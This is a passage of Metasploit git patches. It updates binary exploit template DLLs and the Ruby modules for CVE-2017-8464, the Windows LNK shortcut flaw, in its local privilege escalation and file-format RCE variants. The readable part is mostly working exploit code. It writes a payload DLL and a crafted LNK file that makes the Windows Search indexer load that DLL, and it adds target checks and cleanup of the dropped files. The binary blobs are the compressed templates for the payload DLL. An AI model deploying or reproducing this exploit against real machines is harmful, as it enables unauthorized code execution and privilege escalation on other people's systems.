z{z9?J$72`913P%$YmSr=vC5l~E$OHFcPdk~HVd(qjTBi?D-z^I+dz z$E9k#3^?CMi_vDH{jur}J0}c(6pNpHK1kt-vVeCXX9A8Zczx)@E7E-*7Rti765Wxg z26cTn`u;hu_Z_#D3bW~IlP-+X92W_#Lpbj*y4q#StN!=2+!@)`b#<(KUUT_;+w$5b(dH{NmEUU6Teku z_)RZrTsuA6wi*ZfvyW3f$D8dcrd)jPxxS>fVfm_Qt7cqBKMEFW>uu(m%Gx@o!*&C1 z?D6DRS37J?P38={c|~QDxuMZqTVJ`{Hm%84CDt}JFtd44twVHH*4^f`Io9yXwrX=t zqr;q0ZCN^Rg$*kk8do)# z?M*gkb)(rqzXPqLw&{n>Vq;Zfow?cOXd*^Nb+&5te_d}`t!Qqlz1KEUK5AF=_qWl! zdFHwPY8f>@%|+*ykIq+E&MlAqURrCw@aVba6Gyd|xaQn)HY$I7^||GzN9CF4-15Xx z`IJ$4^Qio0EqvLyl0_V%m`{!>NAJI7c zr$yYgl_0SS#!7+m5AYLv&>g^i6Y#eWpy_WfrcA`24}dlUuSB{IbPn(#q*){n+<+v2 z_5hzjDg{kwnZ(!v(1f=mRfDbo((gd)K&Jq+kVMcqKpWCp(01SITh~EoL1f2qW?+V7!K_3U+nGRopt^mG+Gz;_~aBT*@ z>;>Hdyz@%rB2NY$W^1AlTAepN~`z=TZr3Umta7NoVHOM$zP z+CcXM`#S3_1FWI6LI1-W>3$t@&sxnvY_xczf99d{ql|KSK65NG=0jhaXDiv#@Lg>3H`=F{qYfY zj_!BVM~Oz3I49aGv@<#%m5XB39>N3zOPJ1kVE<14qki~4jOx++j_m)}XRY3K2Pw>K z(fkLR{CFMmGm&N?iMDz>e?y&)Pp4RfXps2zP2slSrp{>p)+6o-CVr^ArU72u^6Zxvw>e9EvQ@u&nFPKpwcel+9_(-1;n#9Hm-Eqqrz}9{hdfEm1vhv z3maC|Ho#LqH;=ODo1?zA0RtZ$ zBDTk{psoq7T2xu*w6WI>->ZZjGiZk7*Wp&GXf

MLEz$_gaj79_4T+;f>08I|3!z zT8XW`k$QD2D=)|WU1Ni7b*;!2AXnSCth@$(!g~`dudHucUe1fy#k%rZ3=uj}&sucl zXm=&ch%47>?ujdRHgMkk`pRXE4v{^oN2r2>zq!!YIBd8a+@r5qMJC`aN?)&)eWS0p z)mPbJ$;F1I+T{(E_=Vgxh9=QbXTz@#rxVpsRc~jv8JcVCj@kyX26LMBs{h7xbJ6@; zimbTuq^nXq6Jg8$YpQQ*u5yS`jimMOyxEhfa{56dpW?B2?4GdaxX0qP zLuv^K*g`W3&j`vIq&I~RIt_aG( zVDPoz7s06^d*~OTK#g*x_xRDqr=C=AwztG<^RD%Jy}P}idcX0e`u@dN z>=S)%-*0?Jd?$RCPPEsd?yaeO?sctG3ZxDS69 zdNcGHm9?lklRTGsW_cEP>O29@bDo2qZ#^04MCh_jBJ1z7Kq5ft3MQ;E6yM z+0w7-sp~$_T}NYU*0bvX2|ZW$l=iIYdA#Sd9&_-(Bq+= z(ALo2&|zvjM^7Qa#(A#x%<+_Y$~{Kkk9>k}sqY@&I^UDNXMG?0uJZrbZ}qSAOa2Z1 zr~SY6@An_{f9OBupGh{f==r~&DeGC+v$5xuo@;_P2k#Cx1%Dp&1)s-AeiBRyWrXrW zOG6KbSchugHJ+P2cYE&jxIIsypNBmkdUW2&-aK!EcY}Ap`;PYu?_a!=d{_CHANn`r zzx@Ed@TK`5_y5j+LBJ9y3EUm153~h-73c}<4;%@66gU;Ib^f}uuk*Fek2;Tce%pCL z*Q~DgE^pVCu5j0DT_1JDcc*vfcHh{2Yj<^bL-&2%^2V~K{`INx{|Uv+z++_Hrf)W7 z_RQ(2>IwD42d4+E!41LZf*%AYhMGhF5qdpD{~Ty4NqeSxYCK(@0naf{p7-Cq`(W=W z?_OV=|9byie|F%Oz`FrfYT#r2d=DzL7!->>-7(0@-Lt#fhb#?G{^3iR)E rm(X3&y}G-jd$2okW6s9K8(TJR-gtUr=2I-J+Hnt!^ZDn0ln4F~E=xCR diff --git a/data/exploits/cve-2017-8464/template_x86_windows.dll b/data/exploits/cve-2017-8464/template_x86_windows.dll old mode 100755 new mode 100644 index b95dfe5232b73f48b2773b4add296114d6793b69..eeef7fb413215ccc7b676fda2873ece79e5e1b8b GIT binary patch literal 17408 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 diff --git a/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb b/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb index 6d2e32a57d..1b316ce6bb 100644 --- a/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb +++ b/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb @@ -47,8 +47,8 @@ class MetasploitModule < Msf::Exploit::Local ], 'DefaultOptions' => { - 'EXITFUNC' => 'thread', - 'WfsDelay' => 45, + 'EXITFUNC' => 'process', + 'WfsDelay' => 30, }, 'Arch' => [ARCH_X86, ARCH_X64], 'Payload' => @@ -78,14 +78,14 @@ class MetasploitModule < Msf::Exploit::Local register_advanced_options( [ OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true]), - OptString.new('LNK_COMMENT', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']), - OptString.new('LNK_DISPLAY_NAME', [true, 'The display name to use in the generated LNK file', 'Flash Player']) + OptString.new('LnkComment', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']), + OptString.new('LnkDisplayName', [true, 'The display name to use in the generated LNK file', 'Flash Player']) ] ) end def exploit - path = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464') + path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-8464') arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch'] datastore['EXE::Path'] = path datastore['EXE::Template'] = ::File.join(path, "template_#{arch}_windows.dll") @@ -105,8 +105,8 @@ class MetasploitModule < Msf::Exploit::Local def generate_link(path) vprint_status("Generating LNK file to load: #{path}") path << "\x00" - display_name = datastore['LNK_DISPLAY_NAME'].dup << "\x00" # LNK Display Name - comment = datastore['LNK_COMMENT'].dup << "\x00" + display_name = datastore['LnkDisplayName'].dup << "\x00" # LNK Display Name + comment = datastore['LnkComment'].dup << "\x00" # Control Panel Applet ItemID with our DLL cpl_applet = [ From 4729c885f1d0b848b7bf18973ce49e47715fdcb3 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Thu, 5 Oct 2017 11:10:37 -0400 Subject: [PATCH 016/254] Cleanup the CVE-2017-8464 LPE module --- .../windows/local/cve_2017_8464_lnk_lpe.rb | 57 +++++++++++++++---- 1 file changed, 45 insertions(+), 12 deletions(-) diff --git a/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb b/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb index 1b316ce6bb..bfc4fc71ba 100644 --- a/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb +++ b/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb @@ -7,7 +7,9 @@ class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE + include Msf::Exploit::FileDropper include Msf::Post::File + include Msf::Post::Windows::Priv attr_accessor :exploit_dll_name @@ -26,8 +28,8 @@ class MetasploitModule < Msf::Exploit::Local the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary DLL file. - If no PATH is specified, the module will use drive letters D through Z so the files - may be placed in the root path of a drive such as a shared VM folder or USB drive. + The PATH option must be an absolute path to a writeable directory which is indexed for + searching. If no PATH is specified, the module defaults to %USERPROFILE%. }, 'Author' => [ @@ -47,8 +49,9 @@ class MetasploitModule < Msf::Exploit::Local ], 'DefaultOptions' => { - 'EXITFUNC' => 'process', - 'WfsDelay' => 30, + 'EXITFUNC' => 'process', + 'FileDropperDelay' => 15, + 'WfsDelay' => 30 }, 'Arch' => [ARCH_X86, ARCH_X64], 'Payload' => @@ -58,7 +61,6 @@ class MetasploitModule < Msf::Exploit::Local 'Platform' => 'win', 'Targets' => [ - [ 'Automatic', { 'Arch' => ARCH_ANY } ], [ 'Windows x64', { 'Arch' => ARCH_X64 } ], [ 'Windows x86', { 'Arch' => ARCH_X86 } ] ], @@ -84,22 +86,53 @@ class MetasploitModule < Msf::Exploit::Local ) end + def check + if session.sys.process['SearchIndexer.exe'] + return Exploit::CheckCode::Detected + end + + Exploit::CheckCode::Safe + end + + def get_name(option, default_ext) + name = datastore[option].to_s.strip + name = "#{rand_text_alpha(16)}.#{default_ext}" if name.blank? + name + end + def exploit + if is_system? + fail_with(Failure::None, 'Session is already elevated') + end + + if session.platform != 'windows' + fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session') + end + + if check == Exploit::CheckCode::Safe + fail_with(Failure::NotVulnerable, 'Exploit not available on this system.') + end + + if sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86 + fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') + elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64 + fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') + end + path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-8464') arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch'] datastore['EXE::Path'] = path datastore['EXE::Template'] = ::File.join(path, "template_#{arch}_windows.dll") - path = datastore['PATH'] || session.fs.file.expand_path("%TEMP%") + path = datastore['PATH'] || session.fs.file.expand_path("%USERPROFILE%") path.chomp!("\\") - dll = generate_payload_dll - dll_name = datastore['DLLNAME'] || "#{rand_text_alpha(16)}.dll" - dll_path = write_file("#{path}\\#{dll_name}", dll) + dll_path = "#{path}\\#{get_name('DLLNAME', 'dll')}" + write_file(dll_path, generate_payload_dll) - lnk = generate_link("#{path}\\#{dll_name}") - lnk_filename = datastore['FILENAME'] || "#{rand_text_alpha(16)}.lnk" - lnk_path = write_file("#{path}\\#{lnk_filename}", lnk) + lnk_path = "#{path}\\#{get_name('FILENAME', 'lnk')}" + write_file(lnk_path, generate_link(dll_path)) + register_files_for_cleanup(dll_path, lnk_path) end def generate_link(path) From e4d99a14b6270f82eca769aa60ad90f62310f9a8 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Thu, 5 Oct 2017 11:38:08 -0400 Subject: [PATCH 017/254] Fix EXITFUNC back to process for the RCE too --- modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb index 252bb7f97e..a91c80694e 100644 --- a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb +++ b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb @@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote ], 'DefaultOptions' => { - 'EXITFUNC' => 'thread' + 'EXITFUNC' => 'process' }, 'Arch' => [ARCH_X86, ARCH_X64], 'Payload' => From 770547269bcbf136ff0d9177d7fbd8e69d7567e4 Mon Sep 17 00:00:00 2001 From: Maurice Popp Date: Fri, 6 Oct 2017 15:39:25 +0200 Subject: [PATCH 018/254] added documentation, and fixed 4 to 2 